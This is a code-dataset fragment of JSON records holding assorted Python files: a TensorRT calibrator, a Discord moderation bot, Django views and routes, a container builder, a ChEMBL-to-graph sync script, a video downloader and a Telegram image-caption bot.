np.ascontiguousarray(value))\n\n\nclass Int8Calibrator:\n \"\"\"The object to use INT8 calibrator.\n\n Args:\n samples(object): The samples for INT8 calibrator.\n batch_size(int): The batch size.\n\n \"\"\"\n\n def __init__(self, samples, batch_size):\n self.batch_size = batch_size\n self.iterator = iter(samples)\n self.network = None\n self.buffer = None\n\n def get_batch(self, names):\n \"\"\"Get the batch of input for calibration.\n\n Args:\n names(list): The names of the network input.\n\n Returns:\n batch(list): The batch of input for calibration.\n\n \"\"\"\n assert self.network is not None\n if self.buffer is not None:\n self.buffer.release()\n self.buffer = None\n self.buffer = _CalibratorBuffer(\n self.network.input_bindings, self.batch_size)\n for i in range(self.batch_size):\n try:\n sample = next(self.iterator)\n except StopIteration:\n self.buffer.release()\n self.buffer = None\n return None\n if type(sample) is not dict:\n if len(names) == 1:\n sample = {names[0]: sample}\n else:\n raise ValueError()\n for key in names:\n self.buffer.put(key, i, sample[key])\n return [self.buffer.allocations[key] for key in names]\n\n def get_batch_size(self):\n \"\"\"Get the batch size.\n\n Returns:\n batch_size(int): The batch size.\n \"\"\"\n return self.batch_size\n", "sub_path": "turret/int8/int8_calibrator.py", "file_name": "int8_calibrator.py", "file_ext": "py", "file_size_in_byte": 2803, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pycuda.driver.mem_alloc", "line_number": 17, "usage_type": "call"}, {"api_name": "pycuda.driver", "line_number": 17, "usage_type": "name"}, {"api_name": "pycuda.driver.memcpy_htod", "line_number": 35, "usage_type": "call"}, {"api_name": "pycuda.driver", "line_number": 35, "usage_type": "name"}, {"api_name": "pycuda.driver.memcpy_htod", "line_number": 37, "usage_type": "call"}, {"api_name": "pycuda.driver", "line_number": 37, "usage_type": "name"}, {"api_name": "numpy.ascontiguousarray", "line_number": 37, "usage_type": "call"}]} +{"seq_id": "267409389", "text": "import discord\nimport datetime\nfrom util.decorator import can_manage_message\nfrom util.exception import InvalidArgs\n\nMOD_DELETED = (\"Votre message a été supprimé par {} pour la raison suivante :\"\n + \"\\n{}\\nRappel du message :\\n{}\")\nMOD_MOVE = (\"Votre message a été déplacé de {} à {} par {} pour la raison \"\n + \"suivante :\\n{}\")\n\nasync def move_message(msg, target, reason):\n em = discord.Embed(description=msg.content, timestamp=msg.created_at)\n em.set_footer(text=\"message déplacé\")\n em.set_author(icon_url=msg.author.avatar_url, name=msg.author.name)\n if msg.attachments:\n em.set_image(url=msg.attachments[0].url)\n await target.send(embed=em)\n await msg.delete()\n if reason:\n await msg.author.send(reason)\n\nclass CmdModeration:\n @can_manage_message\n async def cmd_mdelete(self, *args, message, channel, member, **_):\n \"\"\"/mdelete {message_id} [!][*raison]\"\"\"\n if not args:\n raise InvalidArgs(\"Pas d'argument reçu\")\n msg = await channel.fetch_message(int(args[0]))\n await msg.delete()\n await message.delete()\n if len(args) >= 2:\n reason = ' '.join(args[1:])\n if reason.startswith('!'):\n await msg.author.send(MOD_DELETED.format(member.mention, reason[1:],\n msg.content))\n\n @can_manage_message\n async def cmd_mmove(self, *args, message, member, channel, client, **_):\n \"\"\"/mmove {message_id} {channel} [!][*raison]\"\"\"\n await message.delete()\n if not args:\n raise 
InvalidArgs(\"Pas d'argument reçu\")\n msg = await channel.fetch_message(int(args[0]))\n target = client.get_channel(int(args[1]))\n reason = None\n if len(args) >= 3:\n reason = ' '.join(args[2:])\n if reason.startswith('!'):\n reason = MOD_MOVE.format(channel.mention, target.mention,\n member.mention, reason[1:])\n await move_message(msg, target, reason)\n\n @can_manage_message\n async def cmd_mmoveafter(self, *args, channel, member, message, client, **_):\n \"\"\"/mmoveafter {message_id} {channel} [!][*raison]\"\"\"\n await message.delete()\n if not args:\n raise InvalidArgs(\"Pas d'argument reçu\")\n msg = await channel.fetch_message(int(args[0]))\n target = client.get_channel(int(args[1]))\n reason = None\n if len(args) >= 3:\n reason = ' '.join(args[2:])\n if reason.startswith('!'):\n reason = MOD_MOVE.format(channel.mention, target.mention,\n member.mention, reason[1:])\n history = await channel.history(after=msg.created_at - datetime.timedelta(milliseconds=1),\n limit=None).flatten()\n notified = set()\n for msg in history:\n await move_message(msg, target,\n reason if msg.author not in notified else None)\n notified.add(msg.author)\n", "sub_path": "Commands/moderation_tools.py", "file_name": "moderation_tools.py", "file_ext": "py", "file_size_in_byte": 3112, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "discord.Embed", "line_number": 12, "usage_type": "call"}, {"api_name": "util.exception.InvalidArgs", "line_number": 27, "usage_type": "call"}, {"api_name": "util.decorator.can_manage_message", "line_number": 23, "usage_type": "name"}, {"api_name": "util.exception.InvalidArgs", "line_number": 42, "usage_type": "call"}, {"api_name": "util.decorator.can_manage_message", "line_number": 37, "usage_type": "name"}, {"api_name": "util.exception.InvalidArgs", "line_number": 58, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 67, "usage_type": "call"}, {"api_name": "util.decorator.can_manage_message", "line_number": 53, "usage_type": "name"}]} +{"seq_id": "40290711", "text": "from django.contrib import admin\nfrom django.urls import path\nfrom .views import (\n VendaCreateView\n , ProdutoCreateView\n , VendaListView\n , VendaCorrecaoUpdateView\n , VendaAtualizarObservacaoView\n , VendaAtualizarClienteView\n , VendaView\n , VendaDetailView\n , VendaPDFDetailView\n)\n\nurlpatterns = [\n path('cadastrar/venda', VendaCreateView.as_view(), name=\"cadastrar_venda\"),\n path('cadastrar/produto', ProdutoCreateView.as_view(), name=\"cadastrar_produto\"),\n path('listar/venda', VendaListView.as_view(), name=\"listar_venda\"),\n path('atualizar/venda/', VendaCorrecaoUpdateView.as_view(), name=\"corrigir_venda\"),\n path('atualizar/venda/observacao/', VendaAtualizarObservacaoView.as_view(), name=\"atualizar_observacao_venda\"),\n path('atualizar/venda/cliente/', VendaAtualizarClienteView.as_view(), name=\"atualizar_cliente_venda\"),\n path('ajax/desabilitar/venda/', VendaView.desabilitarVenda, name=\"ajax_desabilitar_venda\"),\n path('ajax/habilitar/venda/', VendaView.habilitarVenda, name=\"ajax_habilitar_venda\"),\n path('detalhes/venda/', VendaDetailView.as_view(), name=\"detalhes_venda\"),\n path('pdf/venda/', VendaPDFDetailView.as_view(), name=\"pdf_venda\"),\n]\n\n", "sub_path": "vendas/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1271, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": 
"django.urls.path", "line_number": 16, "usage_type": "call"}, {"api_name": "views.VendaCreateView.as_view", "line_number": 16, "usage_type": "call"}, {"api_name": "views.VendaCreateView", "line_number": 16, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 17, "usage_type": "call"}, {"api_name": "views.ProdutoCreateView.as_view", "line_number": 17, "usage_type": "call"}, {"api_name": "views.ProdutoCreateView", "line_number": 17, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 18, "usage_type": "call"}, {"api_name": "views.VendaListView.as_view", "line_number": 18, "usage_type": "call"}, {"api_name": "views.VendaListView", "line_number": 18, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 19, "usage_type": "call"}, {"api_name": "views.VendaCorrecaoUpdateView.as_view", "line_number": 19, "usage_type": "call"}, {"api_name": "views.VendaCorrecaoUpdateView", "line_number": 19, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 20, "usage_type": "call"}, {"api_name": "views.VendaAtualizarObservacaoView.as_view", "line_number": 20, "usage_type": "call"}, {"api_name": "views.VendaAtualizarObservacaoView", "line_number": 20, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 21, "usage_type": "call"}, {"api_name": "views.VendaAtualizarClienteView.as_view", "line_number": 21, "usage_type": "call"}, {"api_name": "views.VendaAtualizarClienteView", "line_number": 21, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 22, "usage_type": "call"}, {"api_name": "views.VendaView.desabilitarVenda", "line_number": 22, "usage_type": "attribute"}, {"api_name": "views.VendaView", "line_number": 22, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 23, "usage_type": "call"}, {"api_name": "views.VendaView.habilitarVenda", "line_number": 23, "usage_type": "attribute"}, {"api_name": "views.VendaView", "line_number": 23, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 24, "usage_type": "call"}, {"api_name": "views.VendaDetailView.as_view", "line_number": 24, "usage_type": "call"}, {"api_name": "views.VendaDetailView", "line_number": 24, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 25, "usage_type": "call"}, {"api_name": "views.VendaPDFDetailView.as_view", "line_number": 25, "usage_type": "call"}, {"api_name": "views.VendaPDFDetailView", "line_number": 25, "usage_type": "name"}]} +{"seq_id": "430619170", "text": "from django.shortcuts import render\nfrom django.views import View\n\nfrom .forms import ItemAddForm, ItemFormSet\nfrom inventory.models import Item\n\n# Create your views here.\nclass CreatePurchasingView(View):\n def post(self, request):\n item_formset = ItemFormSet(request.POST)\n \n if item_formset.is_valid():\n for form in item_formset:\n data = form.cleaned_data\n print(data)\n return render(request, \"purchasing_add.html\", {'form': ItemFormSet()})\n\n def get(self, request):\n item_formset = ItemFormSet()\n return render(request, \"purchasing_add.html\", {'form': item_formset})\n", "sub_path": "purchasing/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 659, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.views.View", "line_number": 8, "usage_type": "name"}, {"api_name": "forms.ItemFormSet", "line_number": 10, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 16, 
"usage_type": "call"}, {"api_name": "forms.ItemFormSet", "line_number": 16, "usage_type": "call"}, {"api_name": "forms.ItemFormSet", "line_number": 19, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 20, "usage_type": "call"}]} +{"seq_id": "642608684", "text": "# Copyright 2017 Google Inc. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport abc\nimport cStringIO\nimport gzip\nimport hashlib\nimport os\nimport tarfile\nimport logging\n\n\nclass Base(object):\n \"\"\"Base is an abstract base class representing a container builder.\n\n It provides methods for generating a dependency layer and an application\n layer.\n \"\"\"\n\n __metaclass__ = abc.ABCMeta # For enforcing that methods are overriden.\n\n def __init__(self, ctx):\n self._ctx = ctx\n\n @abc.abstractmethod\n def CreatePackageBase(self, base_image, cache):\n \"\"\"Create an image exists with the packages on this base.\n Args:\n base_image: docker_name.Tag, the base image on which we install pkgs.\n cache: cache.Base, a cache into which artifacts may be read/written.\n Returns:\n a v2_2.docker_image.DockerImage of the above.\n \"\"\"\n\n @abc.abstractmethod\n def BuildAppLayer(self):\n \"\"\"Synthesizes the application layer from the context.\n Returns:\n a raw string of the layer's .tar.gz\n \"\"\"\n\n def __enter__(self):\n \"\"\"Initialize the builder.\"\"\"\n\n def __exit__(self, unused_type, unused_value, unused_traceback):\n \"\"\"Cleanup after the builder.\"\"\"\n\n\nclass JustApp(Base):\n \"\"\"JustApp is an implementation of a builder that only generates an\n application layer.\n \"\"\"\n\n def __init__(self, ctx):\n super(JustApp, self).__init__(ctx)\n\n def CreatePackageBase(self, base_image, cache):\n \"\"\"Override.\"\"\"\n # JustApp doesn't install anything, it just appends\n # the application layer, so return the base image as\n # our package base.\n return base_image\n\n def BuildAppLayer(self):\n \"\"\"Override.\"\"\"\n buf = cStringIO.StringIO()\n logging.info('Starting to generate tarfile from context...')\n with tarfile.open(fileobj=buf, mode='w') as out:\n for name in self._ctx.ListFiles():\n content = self._ctx.GetFile(name)\n info = tarfile.TarInfo(os.path.join('app', name))\n info.size = len(content)\n out.addfile(info, fileobj=cStringIO.StringIO(content))\n logging.info('Finished generating tarfile from context.')\n\n tar = buf.getvalue()\n sha = 'sha256:' + hashlib.sha256(tar).hexdigest()\n\n gz = cStringIO.StringIO()\n logging.info('Starting to gzip tarfile...')\n with gzip.GzipFile(fileobj=gz, mode='w', compresslevel=1) as f:\n f.write(tar)\n logging.info('Finished gzipping tarfile.')\n return gz.getvalue(), sha\n", "sub_path": "ftl/common/builder.py", "file_name": "builder.py", "file_ext": "py", "file_size_in_byte": 3146, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "abc.ABCMeta", "line_number": 31, "usage_type": "attribute"}, {"api_name": "abc.abstractmethod", 
"line_number": 36, "usage_type": "attribute"}, {"api_name": "abc.abstractmethod", "line_number": 46, "usage_type": "attribute"}, {"api_name": "cStringIO.StringIO", "line_number": 77, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 78, "usage_type": "call"}, {"api_name": "tarfile.open", "line_number": 79, "usage_type": "call"}, {"api_name": "tarfile.TarInfo", "line_number": 82, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 82, "usage_type": "call"}, {"api_name": "os.path", "line_number": 82, "usage_type": "attribute"}, {"api_name": "cStringIO.StringIO", "line_number": 84, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 85, "usage_type": "call"}, {"api_name": "hashlib.sha256", "line_number": 88, "usage_type": "call"}, {"api_name": "cStringIO.StringIO", "line_number": 90, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 91, "usage_type": "call"}, {"api_name": "gzip.GzipFile", "line_number": 92, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 94, "usage_type": "call"}]} +{"seq_id": "474416167", "text": "#!/usr/bin/python2\nfrom __future__ import print_function\n\nfrom paths import ChEMBL_Database, Stat\n\nSQL_QueryBinds = \"\"\"\n SELECT m.chembl_id,\n d.action_type,\n t.chembl_id\n FROM Drug_mechanism AS d,\n Molecule_dictionary AS m,\n target_dictionary AS t\n WHERE d.molregno = m.molregno\n AND d.tid = t.tid\n AND t.organism = 'Homo sapiens'\n AND t.target_type = 'SINGLE PROTEIN';\n\"\"\"\nCYPHER_FindBinds = \"\"\"\n MATCH (c:Compound) -\n [b:BINDS_CbP] ->\n (p:Protein)\n RETURN c.chembl_id AS compound_id,\n p.chembl_id AS protein_id,\n b.sources AS sources,\n b.chembl_action_type AS action_type\n\"\"\"\nCYPHER_UpdateBinds = \"\"\"\n MATCH (c:Compound { chembl_id: {compound_id} } ),\n (p:Protein { chembl_id: {protein_id} } )\n MERGE (c)-[b:BINDS_CbP]->(p)\n SET b += {\n chembl_action_type: {action_type},\n sources: {sources}\n }\n RETURN COUNT(b) AS count\n\"\"\"\nCYPHER_DeleteBinds = \"\"\"\n MATCH (c:Compound { chembl_id: {compound_id} } ) -\n [b:BINDS_CbP] ->\n (p:Protein { chembl_id: {protein_id} } )\n DELETE b\n RETURN COUNT(b) AS count\n\"\"\"\n\n\ndef main():\n \"\"\"Update BINDS_CbP edges from ChEMBL sqlite3 database.\"\"\"\n from paths import parse_opts, open_spoke\n opts = parse_opts()\n do_update = opts['u']\n\n import sqlite3\n with sqlite3.connect(ChEMBL_Database) as cdb, open_spoke() as sdb:\n session = sdb.session()\n c = cdb.cursor()\n chembl_binds = get_chembl_binds(c)\n spoke_binds = get_spoke_binds(session)\n with session.begin_transaction() as tx:\n update_binds(tx, spoke_binds, chembl_binds)\n tx.success = do_update\n\n\ndef get_chembl_binds(c):\n \"\"\"Return (compound,protein)->action_type map from ChEMBL.\n\n compound and protein are ChEMBL ids.\n \"\"\"\n chembl_binds = {}\n for row in c.execute(SQL_QueryBinds):\n (compound_chembl_id, action_type, protein_chembl_id) = row\n if action_type is None:\n continue\n # XXX: More checking if needed\n chembl_binds[(compound_chembl_id, protein_chembl_id)] = action_type\n print(\"%d binding interactions in ChEMBL\" % len(chembl_binds))\n return chembl_binds\n\n\ndef get_spoke_binds(session):\n spoke_binds = {}\n for r in session.run(CYPHER_FindBinds):\n compound_id = r[\"compound_id\"]\n protein_id = r[\"protein_id\"]\n sources = r[\"sources\"]\n if sources is None:\n sources = []\n action_type = r[\"action_type\"]\n spoke_binds[(compound_id, protein_id)] = (sources, action_type)\n print(\"%d binding interactions in SPOKE\" % 
len(spoke_binds))\n return spoke_binds\n\n\ndef update_binds(session, spoke_binds, chembl_binds):\n \"\"\"Update BINDS_CbP edges in SPOKE.\n \n spoke_binds is a map: (compound,protein)->(source, action_type)\n chembl_binds is a map: (compound,protein)->action_type\n BINDS_CbP edges fall into three categories:\n new: in ChEMBL but not in SPOKE (add)\n existing: : in both and are the same (ignore) or different (update)\n obsolete: in SPOKE but not in ChEMBL (ignore, delete or update)\n \"\"\"\n SourceName = \"ChEMBL\"\n #\n # Find new/existing/obsolete edges\n #\n chembl_set = set(chembl_binds)\n spoke_set = set(spoke_binds)\n new_edges = chembl_set - spoke_set\n existing_edges = chembl_set & spoke_set\n obsolete_edges = spoke_set - chembl_set\n #\n # Add new edges\n #\n new_stat = Stat()\n for key in new_edges:\n compound_id, protein_id = key\n action_type = chembl_binds[key] # match get_chembl_binds\n rows = session.run(CYPHER_UpdateBinds,\n compound_id=compound_id,\n protein_id=protein_id,\n sources=[SourceName],\n action_type=action_type)\n count = new_stat.add_query_result(rows)\n # if count != 1:\n # print(\"new count!=1\", count, compound_id, protein_id)\n #\n # Update existing edges\n #\n unchanged = 0\n update_stat = Stat()\n for key in existing_edges:\n compound_id, protein_id = key\n sources, spoke_action_type = spoke_binds[key] # match get_spoke_binds\n chembl_action_type = chembl_binds[key]\n if SourceName in sources:\n if chembl_action_type == spoke_action_type:\n unchanged += 1\n continue\n else:\n sources.append(SourceName)\n rows = session.run(CYPHER_UpdateBinds,\n compound_id=compound_id,\n protein_id=protein_id,\n sources=sources,\n action_type=chembl_action_type)\n count = update_stat.add_query_result(rows)\n # if count != 1:\n # print(\"update count!=1\", count, compound_id, protein_id)\n #\n # Drop obsolete edges\n #\n obsolete_stat = Stat()\n for key in obsolete_edges:\n compound_id, protein_id = key\n sources, action_type = spoke_binds[key]\n if SourceName not in sources:\n continue\n if len(sources) == 1:\n rows = session.run(CYPHER_DeleteBinds,\n compound_id=compound_id,\n protein_id=protein_id)\n action = \"delete\"\n else:\n sources.remove(SourceName)\n rows = session.run(CYPHER_UpdateBinds,\n compound_id=compound_id,\n protein_id=protein_id,\n sources=sources,\n action_type=None)\n action = \"update\"\n count = obsolete_stat.add_query_result(rows)\n # if count != 1:\n # print(\"obsolete count!=1\", action, count, compound_id, protein_id)\n #\n # Report statistics\n #\n print(len(spoke_binds), \"edges in SPOKE before update\")\n print(len(chembl_binds), \"edges from ChEMBL\")\n print(\" \", len(existing_edges), \"edges already in SPOKE\")\n print(\" \", len(new_edges), \"edges not in SPOKE\")\n print(len(obsolete_edges), \"SPOKE edges not in ChEMBL\")\n print(\"adding %d new edges (%d failures, %d anomalies)\" %\n (new_stat.attempts, new_stat.failures, new_stat.anomalies))\n print(\"%d edges unchanged\" % unchanged)\n print(\"updating %d edges (%d failures, %d anomalies)\" %\n (update_stat.attempts, update_stat.failures, update_stat.anomalies))\n print(\"obsoleting %d edges (%d failures, %d anomalies)\" %\n (obsolete_stat.attempts, obsolete_stat.failures,\n obsolete_stat.anomalies))\n\n\nif __name__ == \"__main__\":\n profile = False\n if not profile:\n main()\n else:\n import cProfile, pstats\n pr = cProfile.Profile()\n pr.runcall(main)\n stats = pstats.Stats(pr)\n stats.strip_dirs().sort_stats(\"cumulative\").print_stats(20)\n", "sub_path": 
"update/update_CbP_chembl.py", "file_name": "update_CbP_chembl.py", "file_ext": "py", "file_size_in_byte": 6993, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "paths.parse_opts", "line_number": 49, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 53, "usage_type": "call"}, {"api_name": "paths.ChEMBL_Database", "line_number": 53, "usage_type": "argument"}, {"api_name": "paths.open_spoke", "line_number": 53, "usage_type": "call"}, {"api_name": "paths.Stat", "line_number": 115, "usage_type": "call"}, {"api_name": "paths.Stat", "line_number": 131, "usage_type": "call"}, {"api_name": "paths.Stat", "line_number": 153, "usage_type": "call"}, {"api_name": "cProfile.Profile", "line_number": 199, "usage_type": "call"}, {"api_name": "pstats.Stats", "line_number": 201, "usage_type": "call"}]} +{"seq_id": "59737712", "text": "import re\nimport os\nimport logging\nfrom pccold.config import conf\nimport requests\n\nroom_obj_list = []\n\nfrom .tools import read, saveStream, ReturnCodeObserverThread, SleepKillerThread\nfrom .bypyrm import doBypy\n\nisinit = False\n\n\ndef getRoomObjList():\n global room_obj_list\n global isinit\n global conf\n files = os.listdir(conf.download_path)\n if isinit:\n return room_obj_list\n logging.info('init room obj list')\n md = read(conf.videolist_path)\n lines = md.split('\\n')\n for l in lines:\n match = re.match(r'\\[(.*)\\]\\((.*)\\)', l)\n if l and match:\n room_obj = {'file_name': match.group(\n 1)+'.mp4', 'url': match.group(2)}\n if room_obj.get('file_name', '') in files:\n logging.info(room_obj.get('file_name', '')+' is exist')\n else:\n room_obj_list.append(room_obj)\n isinit = True\n return room_obj_list\n\n\ndef downloadVideo():\n global conf\n print('videodownload main')\n room_obj_list = getRoomObjList()\n if len(room_obj_list) > 0:\n room_obj = room_obj_list.pop()\n saveStream('source', room_obj.get(\n 'file_name', 'default.mp4'), url=room_obj.get('url', ''))\n elif conf.is_bypy:\n doBypy()\n\n\ndef reqVideoList(author):\n result = []\n api = 'https://v.douyu.com/show/'\n url = \"https://v.douyu.com/video/author/getAuthorShowAndVideoList?up_id={author}\".format(\n author=author)\n data = requests.get(url).json()\n ls = data.get('data').get('list')\n for l in ls:\n vls = l.get('video_list')\n for ll in vls:\n title = ll.get('title')\n file_name = re.sub(r\"[\\/\\\\\\:\\*\\?\\\"\\<\\>\\| \\$\\^\\+\\-\\!]\", '_', title)\n result.append({'url': api+ll.get('hash_id'),\n 'file_name': file_name+'.mp4'})\n return result\n\n\ndef download3DaysVideo():\n global conf\n room_obj_list = reqVideoList(conf.video_author)\n if len(room_obj_list) > 0:\n room_obj = room_obj_list.pop()\n saveStream('source', room_obj.get(\n 'file_name', 'default.mp4'), url=room_obj.get('url', ''))\n elif conf.is_bypy:\n doBypy()\n\n\nif __name__ == '__main__':\n downloadVideo()\n", "sub_path": "pccold/videodownload.py", "file_name": "videodownload.py", "file_ext": "py", "file_size_in_byte": 2221, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.listdir", "line_number": 19, "usage_type": "call"}, {"api_name": "pccold.config.conf.download_path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "pccold.config.conf", "line_number": 19, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 22, "usage_type": "call"}, {"api_name": "tools.read", "line_number": 23, "usage_type": "call"}, {"api_name": 
"pccold.config.conf.videolist_path", "line_number": 23, "usage_type": "attribute"}, {"api_name": "pccold.config.conf", "line_number": 23, "usage_type": "name"}, {"api_name": "re.match", "line_number": 26, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 31, "usage_type": "call"}, {"api_name": "tools.saveStream", "line_number": 44, "usage_type": "call"}, {"api_name": "pccold.config.conf.is_bypy", "line_number": 46, "usage_type": "attribute"}, {"api_name": "pccold.config.conf", "line_number": 46, "usage_type": "name"}, {"api_name": "bypyrm.doBypy", "line_number": 47, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 55, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 61, "usage_type": "call"}, {"api_name": "pccold.config.conf.video_author", "line_number": 69, "usage_type": "attribute"}, {"api_name": "pccold.config.conf", "line_number": 69, "usage_type": "name"}, {"api_name": "tools.saveStream", "line_number": 72, "usage_type": "call"}, {"api_name": "pccold.config.conf.is_bypy", "line_number": 74, "usage_type": "attribute"}, {"api_name": "pccold.config.conf", "line_number": 74, "usage_type": "name"}, {"api_name": "bypyrm.doBypy", "line_number": 75, "usage_type": "call"}]} +{"seq_id": "389431541", "text": "# coding: utf-8\nfrom PIL import Image as Image\nfrom PIL import ImageFont\nfrom PIL import ImageDraw\nfrom bs4 import BeautifulSoup\nfrom random import randint\nimport requests, urllib.request, textwrap, os, dryscrape, time, dryscrape, \\\ntelepot, random, sys, MySQLdb\n\nimgdir = sys.argv[1] + '/images'\n\n# --- Set API keys ---\ntgkey = \"SELECT * FROM auth WHERE keyname = '%s'\"\n\ndef get_auth(name):\n db=MySQLdb.connect(read_default_group='files')\n cursor = db.cursor()\n botname = name\n cursor.execute(tgkey % (botname))\n results = cursor.fetchall()\n for row in results:\n token = row[1]\n keys = token.split('\\n')\n return keys\n\nkeys=get_auth('insbot')\n\ni_key = keys[1]\ni_secret = keys[2]\n\n# --- Set telegram bot instance ---\nbot = telepot.Bot(keys[0])\nresponse = bot.getUpdates()\n\n# --- Open tags file ---\ntags = sys.argv[2] + '/tags.txt'\nwith open(tags,'r') as f:\n tags = eval(f.read())\n\ndef gen_img():\n count = 0\n while count == 0:\n try:\n path = '{0}/{1}'.format(imgdir,random. 
\\\n choice(os.listdir(\"{0}/\".format(imgdir))))\n count +=1\n except:\n pass\n return path\n\ndef upload_img(image):\n path = image\n response = requests.post('https://api.imagga.com/v1/content',\n auth=(i_key, i_secret),\n files={'image': open(path, 'r+b')})\n fileid = response.json()['uploaded'][0]['id']\n uploaded = fileid, path\n return uploaded\n\ndef get_tag(uploaded):\n image = uploaded\n image_id = image[0]\n image_path = image[1]\n response = requests.get('https://api.imagga.com/v1/tagging?content={0}' \\\n .format(image_id), auth=(i_key, i_secret))\n tag = response.json()['results'][0]['tags'][0]['tag']\n certainty = response.json()['results'][0]['tags'][0]['confidence']\n for key, value in tags.items():\n if tag in key:\n tag = value\n certainty = randint(68,99)\n metadata = image_path, tag, certainty\n return metadata\n\ndef get_quote(metadata):\n metadata = metadata\n image_path = metadata[0]\n tag = metadata[1]\n url = 'http://railgang.com/markov.php?tags={0}'.format(tag)\n user_agent = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.7) \\\n Gecko/2009021910 Firefox/3.0.7'\n headers={'User-Agent':user_agent,}\n count = 0\n while count == 0:\n try:\n request=urllib.request.Request(url,None,headers)\n quote = urllib.request.urlopen(request).read()\n quote = quote.decode('ascii')\n count += 1\n except:\n pass\n image_with_quote = image_path, quote, tag\n return image_with_quote\n\ndef draw_img(path_and_quote):\n data = path_and_quote\n filepath = data[0]\n quote = data[1]\n img = Image.open(filepath)\n draw = ImageDraw.Draw(img)\n width, height = img.size\n if width <= 360:\n img = '{0}/{1}'.format(imgdir,random.\\\n choice(os.listdir(\"{0}/\".format(imgdir))))\n elif width <= 650:\n fsize = 25\n margin = offset = randint(0,50)\n linewidth = 30\n else:\n fsize = 30\n margin = offset = randint(0,120)\n linewidth = 40\n font = ImageFont.truetype('{0}/Adventure.otf'.format(sys.argv[1]), fsize)\n return filepath, img, quote, font, fsize, margin, offset, linewidth, draw\n\ndef theimg(image):\n imgf, img, quote, font, fsize, margin, offset, linewidth, draw = image\n shadowcolor = \"black\"\n for line in textwrap.wrap(quote, width=linewidth):\n draw.text((margin-2, offset-2), line, font=font, fill=shadowcolor)\n draw.text((margin+2, offset-2), line, font=font, fill=shadowcolor)\n draw.text((margin-2, offset+2), line, font=font, fill=shadowcolor)\n draw.text((margin+2, offset+2), line, font=font, fill=shadowcolor)\n draw.text((margin, offset), line, font=font, fill=\"#ffffff\")\n offset += font.getsize(line)[1]\n\n output = '{0}/outimg.jpg'.format(sys.argv[1])\n img.save(output)\n return output\n", "sub_path": "images.py", "file_name": "images.py", "file_ext": "py", "file_size_in_byte": 3975, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "sys.argv", "line_number": 10, "usage_type": "attribute"}, {"api_name": "MySQLdb.connect", "line_number": 16, "usage_type": "call"}, {"api_name": "telepot.Bot", "line_number": 32, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 36, "usage_type": "attribute"}, {"api_name": "random.choice", "line_number": 44, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 45, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 53, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 64, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 71, "usage_type": "call"}, {"api_name": 
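theimg in images.py above fakes a text outline by stamping each line four times in black at diagonal offsets before drawing the white fill on top. The trick in isolation; PIL's bundled default font stands in for the project's Adventure.otf:

from PIL import Image, ImageDraw, ImageFont

img = Image.new('RGB', (320, 80), 'gray')
draw = ImageDraw.Draw(img)
font = ImageFont.load_default()  # stand-in for the project's Adventure.otf
x, y, text = 10, 30, 'outlined text'
for dx, dy in ((-2, -2), (2, -2), (-2, 2), (2, 2)):  # the four corner offsets
    draw.text((x + dx, y + dy), text, font=font, fill='black')
draw.text((x, y), text, font=font, fill='white')  # white fill drawn last, on top
img.save('outline_demo.png')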
